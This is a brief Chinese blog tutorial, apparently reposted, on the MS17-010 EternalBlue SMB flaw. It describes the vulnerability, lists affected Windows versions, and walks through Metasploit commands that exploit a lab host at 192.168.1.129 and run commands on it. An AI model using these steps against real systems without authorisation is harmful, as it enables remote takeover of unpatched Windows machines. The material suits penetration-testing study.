| 关键词: Windows 漏洞 代码 服务器 010 端口 Microsoft 模块 17 恶意 |
直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。 ---- 网易云热评 一、漏洞简介 MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。 如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 2017年, The Shadow Brokers决定公开一部分有价值的工具, 其中”eternal blue”(永恒之蓝) 就是其中之一(漏洞编号ms 17-010) Eternal blue通过TCP端口445和139来利用SMB v 1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器, 无需用户任何操作, 只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、漏洞影响 目前已知受影响的Windows版本包括但不限于:WindowsNT, Windows 2000、WindowsXP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008R 2、Windows Server 2012SPO。 三、漏洞利用 1、打开Metasploit,搜索ms17-010可利用模块,search ms17-010 2、选择模块use exploit/windows/smb/ms17_010_eternalblue 3、查看需要设置的参数show options ![]() 4、设置攻击目标set rhosts 192.168.1.129 5、run,攻击 ![]() 6、输入systeminfo,查看系统 ![]() 7、解决乱码,输入 chcp 65001 ![]() 禁止非法,后果自负 欢迎关注公众号:web安全工具库 |
| 本文出处: https://www.toutiao.com/a6826708712036499980/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|